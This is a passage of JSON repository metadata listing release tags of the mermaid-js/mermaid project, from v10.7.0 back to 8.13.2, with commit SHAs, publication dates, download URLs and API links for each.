s"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z